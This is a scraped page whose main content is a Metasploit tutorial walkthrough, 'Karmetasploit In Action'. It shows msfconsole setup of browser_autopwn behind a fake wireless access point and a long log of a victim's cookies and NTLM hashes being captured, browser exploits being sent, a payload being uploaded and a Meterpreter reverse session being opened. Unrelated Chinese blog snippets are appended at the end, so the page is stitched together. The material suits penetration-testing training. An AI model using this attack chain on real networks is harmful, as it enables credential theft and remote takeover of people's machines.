Karmetasploit In Action

https://www.offensive-security.com/metasploit-unleashed/karmetasploit-action/

Now, with everything ready, all that is left is to run Karmetasploit! We start up Metasploit, feeding it our run control file.

root@kali:~# msfconsole -r karma.rc

                                  _

                                 | |      o

 _  _  _    _ _|_  __,   ,    _  | |  __    _|_

/ |/ |/ |  |/  |  /  |  / _|/ _|/  /  _|  |

  |  |  |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/

                           /|

                           |                   

       =[ metasploit v3.3-rc1 [core:3.3 api:1.0]

+ -- --=[ 372 exploits - 234 payloads

+ -- --=[ 20 encoders - 7 nops

       =[ 149 aux

resource> load db_sqlite3

[-]

[-] The functionality previously provided by this plugin has been

[-] integrated into the core command set.  Use the new 'db_driver'

[-] command to use a database driver other than sqlite3 (which

[-] is now the default).  All of the old commands are the same.

[-]

[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin

resource> db_create /root/karma.db

[*] Creating a new database instance...

[*] Successfully connected to the database

[*] File: /root/karma.db

resource> use auxiliary/server/browser_autopwn

resource> setg AUTOPWN_HOST 10.0.0.1

AUTOPWN_HOST => 10.0.0.1

resource> setg AUTOPWN_PORT 55550

AUTOPWN_PORT => 55550

resource> setg AUTOPWN_URI /ads

AUTOPWN_URI => /ads

resource> set LHOST 10.0.0.1

...snip...

[*] Using URL: http://0.0.0.0:55550/hzr8QG95C

[*]  Local IP: http://192.168.2.2:55550/hzr8QG95C

[*] Server started.

[*] Handler binding to LHOST 0.0.0.0

[*] Started reverse handler

[*] Server started.

[*] Handler binding to LHOST 0.0.0.0

[*] Started reverse handler

[*] Server started.

msf auxiliary(http) >

At this point, we are up and running. All that is required now is for a client to connect to the fake access point. When they connect, they will see a fake “captive portal” style screen regardless of what website they try to connect to. You can look through your output, and see that a wide number of different servers are started. From DNS, POP3, IMAP, to various HTTP servers, we have a wide net now cast to capture various bits of information.

Now lets see what happens when a client connects to the fake AP we have set up.

msf auxiliary(http) >

[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)

[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)

[*] HTTP REQUEST 10.0.0.100 > www.msn.com:80 GET / Windows IE 5.01 cookies=MC1=V=3&GUID=e2eabc69be554e3587acce84901a53d3; MUID=E7E065776DBC40099851B16A38DB8275; mh=MSFT; CULTURE=EN-US; zip=z:68101|la:41.26|lo:-96.013|c:US|hr:1; FlightGroupId=14; FlightId=BasePage; hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F; hpcli=W.H|L.|S.|R.|U.L|C.|H.; ushpwea=wc:USNE0363; wpv=2

[*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)

[*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)

[*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)

[*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)

...snip...

[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)

[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)

[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)

[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)

[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)

[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)

[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)

[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)

[*] Request '/ads' from 10.0.0.100:1278

[*] Recording detection from User-Agent

[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)

[*] Browser claims to be MSIE 5.01, running on Windows 2000

[*] DNS 10.0.0.100:1293 XID 97 (IN::A google.com)

[*] Error: SQLite3::SQLException cannot start a transaction within a transaction /usr/lib/ruby/1.8/sqlite3/errors.rb:62:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:47:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:39:in `commence'/usr/lib/ruby/1.8/sqlite3

...snip...

[*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > gather.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > gmail.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8

[*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8

[*] HTTP REQUEST 10.0.0.100 > linkedin.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > livejournal.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > monster.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > myspace.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > ryze.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] Sending MS03-020 Internet Explorer Object Type to 10.0.0.100:1278...

[*] HTTP REQUEST 10.0.0.100 > slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=

[*] Received 10.0.0.100:1360 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0

...snip...

[*] HTTP REQUEST 10.0.0.100 > www.monster.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0

[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...

[*] HTTP REQUEST 10.0.0.100 > www.myspace.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] AUTHENTICATED as TARGETP0WN3D...

[*] Connecting to the ADMIN$ share...

[*] HTTP REQUEST 10.0.0.100 > www.plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] Regenerating the payload...

[*] Uploading payload...

[*] HTTP REQUEST 10.0.0.100 > www.ryze.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] Created UxsjordQ.exe...

[*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] Connecting to the Service Control Manager...

[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > www.gather.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=

[*] Obtaining a service manager handle...

[*] Creating a new service...

[*] Closing service handle...

[*] Opening service...

[*] Starting the service...

[*] Transmitting intermediate stager for over-sized stage...(191 bytes)

[*] Removing the service...

[*] Closing service handle...

[*] Deleting UxsjordQ.exe...

[*] Sending Access Denied to 10.0.0.100:1362 TARGET\P0WN3D

[*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0

[*] Sending Access Denied to 10.0.0.100:1362

[*] Received 10.0.0.100:1365 TARGET\P0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0

[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...

[*] AUTHENTICATED as TARGETP0WN3D...

[*] Ignoring request from 10.0.0.100, attack already in progress.

[*] Sending Access Denied to 10.0.0.100:1365 TARGET\P0WN3D

[*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...

[*] Sending stage (2650 bytes)

[*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...

[*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 5.01 cookies=

[*] Sleeping before handling stage...

[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies=

[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies=

[*] Uploading DLL (75787 bytes)...

[*] Upload completed.

[*] Migrating to lsass.exe...

[*] Current server process: rundll32.exe (848)

[*] New server process: lsass.exe (232)

[*] Meterpreter session 1 opened (10.0.0.1:45017 -> 10.0.0.100:1364)

msf auxiliary(http) > sessions -l

Active sessions

===============

  Id  Description  Tunnel

  --  -----------  ------

  1   Meterpreter  10.0.0.1:45017 -> 10.0.0.100:1364

kali linux karmetasploit配置【续】的更多相关文章

  1. kali linux karmetasploit配置

    原理分析:http://www.freebuf.com/articles/77055.html 转官方说明:https://www.offensive-security.com/metasploit- ...

  2. Kali linux网络配置

    Kali linux 安装完成后,需要对其网络进行配置.使用DHCP服务是配置网卡最简单的方法之一,但渗透测试时通常不会这样做,因为系统会被记录在DHCP服务器的数据库中. 1  动态DHCP方式 配 ...

  3. Kali Linux 初始化配置:Apache2 /SSH /FTP

    Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统.Kali Linux预装了许多渗透测试软件,包括nmap .Wireshark .John the Ripper, ...

  4. 安装在virtualbox中的kali linux如何配置无线网卡

    1.安装在virtualbox里的kali无法使用所在物理机的wifi 2.必须通过usb方式,如图所示 3.所使用的usb无线网卡必须是kali2.0支持的 4.我的型号是TL-WN823N 2.0 ...

  5. kali linux 开启配置ssh服务

    1.    一.配置SSH参数 修改sshd_config文件,命令为: vi /etc/ssh/sshd_config 将#PasswordAuthentication no的注释去掉,并且将NO修 ...

  6. kali linux 网络配置

    /etc/init.d/networking restart service newworking restart ifdown eth0 ifup eth0 ifconfig down eth0 i ...

  7. Kali linux 2016.2(Rolling)安装之后的常用配置

    前言 使用默认的Kali Linux设置来学习是可以的,但是我们通常要修改系统的一些基本设置,来最大化使用Kali平台的功能. 以下内容 网络的基础知识 使用图形用户界面来配置网卡 使用命令行来配置网 ...

  8. Python黑帽编程1.1虚拟机安装和配置 Kali Linux 2016

    Python黑帽编程1.1虚拟机安装和配置 Kali Linux 2016 0.1  本系列教程说明 本系列教程,采用的大纲母本为<Understanding Network Hacks Att ...

  9. Kali Linux虚拟机安装完整安装过程及简单配置(视频)

    点击播放视频 附:视频中出现的两个txt文本,包含了大致的安装与配置过程: 文本1:KaliLinux虚拟机安装和初步配置 Kali Linux虚拟机安装和初步配置 大家好,今天给大家演示一下在VMw ...

随机推荐

  1. 使用分布式数据库集群做大数据分析之OneProxy

    一.十亿数据,轻松秒出 实时监控领域有两个显著的特点,一是数据来源很多而且数据量大,有来自监控摄像头.GPS.智能设备等:二是需要实时处理.我们的客户在做实时处理时,就遇到这样的问题.客户的某个数据表 ...

  2. mysql spider之拆库无忧

    数据库的三板斧 先上MySQL,之后再上读写分离,然后呢? 后面典型的做法是垂直拆库和水平分表. 一旦数据库拆了之后,代价就来了. 1.事务不能跨库了(少,但是很重要,可以适当改写) 2.相关的关联查 ...

  3. 父类中“this” 指向问题

    “this.字段”如果出现在父类代码中,指的就是父类属性. “this.方法”不管出现在父类还是子类代码中,指的都是子类方法. “this.字段”如果出现在子类代码中,指的就是子类属性. 在程序的时候 ...

  4. java对于文件传输时---编码格式的一些设置方法

    - ----转 读文件: BufferedReader 从字符输入流中读取文本,缓冲各个字符,从而提供字符.数组和行的高效读取. 可以指定缓冲区的大小,或者可使用默认的大小.大多数情况下,默认值就足够 ...

  5. Or

    1.  数据库表空间和数据文件 2.关于数据库端口的解析 SQLSever  1433 MySql     3306 Oracle     1521 3.关于listener.ora位置 修改该界面上 ...

  6. C++格式化输入输出

    要实现格式化输入输出,程序需要包含 iostreams 标准标头 <iomanip> 以定义几个各自采用单个参数的操控器. 备注: 其中每个操控器都返回重载 basic_istream&l ...

  7. 去除DataTable重复数据的三种方法

    业务需求 最近做一个把源数据库的数据批次导出到目标数据库.源数据库是采集程序采集而来的原始数据库,所以需要对其进行一些处理(过滤一些为空,长度太短或太长,非法字符,重复数据)然后在进行入库. 其中要避 ...

  8. jquery mobile 请求数据方法执行时显示加载中提示框

    在jquery mobile开发中,经常需要调用ajax方法,异步获取数据,如果异步获取数据方法由于网速等等的原因,会有一个反应时间,如果能在点击按钮后数据处理期间,给一个正在加载的提示,客户体验会更 ...

  9. Objective-C:Foundation框架-常用类-NSMutableDictionary

    直接上代码吧: #import <Foundation/Foundation.h> @interface Student : NSObject @property (nonatomic, ...

  10. Android WebView的使用

    WebView是View的一个子类,使用它可以在App中嵌入H5页面,可以跟js互相调用. webview有两个方法:setWebChromeClient和setWebClient setWebCli ...